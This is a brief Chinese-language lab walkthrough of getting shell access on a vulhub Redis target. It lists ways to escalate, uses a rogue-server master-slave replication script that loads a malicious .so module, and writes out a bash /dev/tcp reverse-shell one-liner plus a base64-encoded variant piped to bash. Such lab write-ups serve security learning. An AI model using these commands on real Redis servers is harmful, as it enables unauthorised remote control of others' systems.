靶场

通过vulhub搭建靶场

靶场搭建不再赘述直接docker-compose up -d启动!

可以看到靶场已经启动了

主要拿权限的就几个方法:

  1. 写入webshell(没有web服务,就跳过)

  2. 写入公钥(这个靶场可以修改配置写公钥,但是它没有ssh服务)

  3. 写入定时任务(这容器也没有定时任务)

  4. 使用提供的脚本进行命令执行

  5. 主从复制

1、使用脚本进行命令执行(利用主从复制,加载恶意.so文件执行命令)

使用靶场提供的python脚本进行执行,需要自行编译文件。自行尝试后编译一堆报错直接找了一个编译好的文件:https://github.com/xj-test-user/redis-rogue-getshell

直接在本机执行python脚本

这里再想能不能利用该脚本进行反弹shell,尝试了基础的nc反弹命令bash -i >& /dev/tcp/[IP]/[Port] 0>&1 发现一直没有反应。

然后又尝试对命令进行base64然后执行,成功反弹shell。

base64后的命令:

(echo '[base64后的命令]' | base64 -d | bash)